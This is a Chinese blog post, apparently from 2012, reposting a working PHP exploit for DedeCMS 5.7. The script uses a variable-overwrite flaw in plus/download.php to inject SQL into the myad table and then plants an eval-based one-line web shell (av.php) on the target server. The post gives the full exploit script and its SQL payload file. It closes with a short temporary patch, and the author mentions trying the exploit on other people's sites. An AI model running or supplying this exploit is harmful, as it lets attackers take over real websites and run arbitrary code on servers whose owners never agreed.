正在阅读:

Dedecms最新GetShell+临时补丁

15,388

dedecms最近太火了,只是哥测试了几个站没有一个成功的,所以也就没有上心了,今天在核总的站上面看了一个exp,getshell的,转过来凑个热闹。

其实getshell 方法很多 不要一直纠结 怎么插入 mytag 表 比如附近的myad表就是个好地方 update 个一句话啥的 不多说了 不多说了 直接给 getshell exp吧

<?php
error_reporting(0);
@ini_set('memory_limit', '-1');
set_time_limit(0);
if (!$argv[1]) {
    echo "
/*=================================================
====Name:dedecms 5.7 getshell                  ====
===================================================
====Usage:php  dede.php   http://www.av.com    ====
===================================================
====Team:C0dePlay  Team    www.C0dePlay.com    ====
===================================================
====Author: Yaseng  『WwW.Yaseng.Me』          ====
====Date: 2012-06-15 01:35:00                  ====
===================================================*/
";
    exit();
}
exploit($argv[1]);
function fuck_dede($sql)
{
    $str = "";
    for ($i = 0; $i < strlen($sql); $i++) {
        $str .= "arrs2[]=" . ord($sql[$i]) . "&";
    }
    return $str;
}

function  exploit($site)
{
    msg("Pentest:" . $site);
    $sql1 = file_get_contents("1.txt");
    file_get_contents($site . "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&" . fuck_dede($sql1));
    file_get_contents($site . "/plus/ad_js.php?aid=1&nocache=1");
    $shell = $site . "/plus/av.php";
    if (strpos(file_get_contents($shell), 'x')) {
        msg("Exploit Succeed :" . $shell);
        file_put_contents("dedeshell.txt", $shell . "\r\n", FILE_APPEND);
    } else {
        msg("Exploit failed:" . $shell);
    }
}

function  msg($str, $type = 1)
{
    $str = ($type) ? "[+]" . $str : "[-]" . $str;
    echo $str . "\r\n";
}
?>

要修改密码啥的 直接改 1.txt吧

#1.txt

myad` SET  normbody='<?php $fp = @fopen(''av.php'', ''a'');@fwrite($fp, ''<?php eval($_POST[110]) ?>axxxxx'');echo ''OK'';@fclose($fp);?>'  where aid =1 #

dedecms_getshell

临时补丁:

不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的 试了下 貌似不影响网站运行

include/dedesql.class.php

if(isset($GLOBALS['arrs1'])) 
    { 
        $v1 = $v2 = ''; 
        for($i=0;isset($arrs1[$i]);$i++) 
        { 
            $v1 .= chr($arrs1[$i]); 
        } 
        for($i=0;isset($arrs2[$i]);$i++) 
        { 
           // $v2 .= chr($arrs2[$i]);  //注释这里   
        } 
        $GLOBALS[$v1] .= $v2; 
    }

原文地址:

http://lcx.cc/?i=3569

http://zone.wooyun.org/content/4231

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌